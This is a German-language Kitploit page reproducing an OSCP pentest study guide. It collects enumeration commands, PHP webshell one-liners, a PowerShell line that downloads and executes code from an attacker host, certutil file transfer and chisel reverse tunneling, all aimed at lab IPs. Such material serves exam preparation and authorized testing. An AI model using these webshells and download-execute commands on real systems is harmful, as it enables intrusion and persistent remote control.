Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
OSCP — OSCP-Studienführer | Kitploit
Tools/GitHubGitHub/rootsecdev/oscp
AufklärungExploitationWebanwendungs-ExploitationPost-ExploitationWebsicherheitNetzwerksicherheitPenetrationstestsLernen & BildungRed Teaming
GitHubrootsecdev/oscp

OSCP

OSCP-Studienführer

4251vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
Teilen

OSCP

OSCP-Studienführer

Inhaltsverzeichnis

Enumeration und Aufklärung

Web-Enumeration

Nikto-Scan:

root@kitploit:~
nikto -h http://10.10.10.1

Directory-Busting mit verschiedenen Tools:

DIRB

root@kitploit:~
dirb http://10.10.10.1

Gobuster

root@kitploit:~
gobuster dir -u http://10.129.155.74:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx

Pentesting von Webanwendungen

XSS-Payloads: Cheatsheet: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection

Grundlegende XSS-Formulartests entweder mit netcat-Listener oder Python-Webserver

root@kitploit:~

Cross-Site-Scripting, um base64-Cookies auszulesen. Achte darauf, in Burp mit Strg + U URL-zu-kodieren

root@kitploit:~

Webshells

Referenz: https://sushant747.gitbooks.io/total-oscp-guide/content/webshell.html

Einfache PHP-Webshell zur Befehlsausführung

root@kitploit:~
<?php system($_REQUEST ['cmd']) ?>
root@kitploit:~
<?php system($_GET['cmd']); ?>

SNMP-Pentesting

Port 161 UDP

root@kitploit:~
snmpwalk -c public -v2c 10.129.213.210
root@kitploit:~
snmp-check 10.129.213.210

SMB-Pentesting

root@kitploit:~
crackmapexec smb 10.129.70.254 

Offene anonyme Freigaben erkennen

root@kitploit:~
smbclient -L //10.129.70.254

Null-Authentifizierung

root@kitploit:~
smbclient -N -L //10.129.70.254

Post-Exploitation

Herunterladen und Übertragen von Dateien

Certutil:

root@kitploit:~
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

PowerShell:

root@kitploit:~
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
root@kitploit:~
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.11.0.4/nc.exe')"

Portweiterleitung und Tunneling

Verwendung von Chisel:

Beispiel für die Portweiterleitung, damit Port 910 auf der Kali-Box verfügbar ist

root@kitploit:~
on victim machine setup port forwarding
chisel.exe client 10.10.16.10:5555 R:910:127.0.0.1:910
root@kitploit:~
On Kali attack box setup a reverse listner for port forward with chisel
./chisel server --port 5555 --reverse
Tool herunterladen